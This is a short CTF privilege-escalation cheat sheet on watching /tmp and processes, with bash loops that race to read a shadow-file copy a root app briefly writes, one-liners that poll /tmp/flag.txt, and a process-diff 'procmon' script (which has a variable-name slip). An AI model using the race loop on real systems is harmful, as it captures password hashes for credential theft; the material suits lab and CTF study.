Monitor Files

Method 1 - ls loop

An app escalates your session to Root Saves the shadow-file in tmp, but then deletes it.. CTF Example: BetterSSH.py Thanks: Pivonka

#!/bin/bash

while true
do
		file=$(ls -1A /tmp/SSH)
		if [ $(ls -1A /tmp/SSH| wc -l) -gt 0 ]
		then
				cat /tmp/SSH/$file
				exit 1
		fi
done

Method 2 - while cat

Watch for the latest entry to /tmp Sleep 0 ..if you want it faster

Watch for a new file:
> while : ; do ls -At /tmp | head -n1; sleep 1; done

Cat the new file:
> while : ; do cat '/tmp/flag.txt' 2>/dev/null; sleep 1; done

Watch jobs

> watch -n 1 'systemctl list-timers'

Watch Proc - "procmon":

  • procmon.sh ...from ippsec on ninevehHTB

  • bash ./procmon.sh

  • REF: cron jobs

#!/bin/bash
IFS=$'\n'
old_proc=$(ps -eo command)
while true; do
  new_process=$(ps -eo command)
  diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]
  sleep 1
  old_process=$new_process
done
Previousbash prisonNextmongodb node

Last updated